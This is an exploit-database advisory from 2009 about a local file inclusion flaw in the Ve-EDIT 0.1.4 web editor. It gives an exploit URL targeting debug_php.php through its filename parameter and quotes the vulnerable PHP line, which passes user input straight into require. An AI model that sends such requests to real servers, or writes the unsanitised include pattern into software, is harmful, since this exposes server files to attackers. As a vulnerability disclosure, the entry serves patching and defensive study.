Ve-EDIT 0.1.4 - debug_PHP.php Local File Inclusion

2009-09-01T00:00:00
ID EXPLOITPACK:432BC44C3A76F3E27078BDA1971C4205
Type exploitpack
Reporter CoBRa_21
Modified 2009-09-01T00:00:00

Description

Ve-EDIT 0.1.4 - debug_PHP.php Local File Inclusion

                                        
                                            -------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu[at]windowslive[dot]com
 
Script Download: http://sourceforge.net/projects/phpwebeditor/
 
-------------------------------------------------------------------------------------
 
EXPLOÄ°T:
 
http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFÄ°]
 
-------------------------------------------------------------------------------------
 
BUG
Line 53:        require("./../".$_GET["filename"]); 
 
-------------------------------------------------------------------------------------

# milw0rm.com [2009-09-01]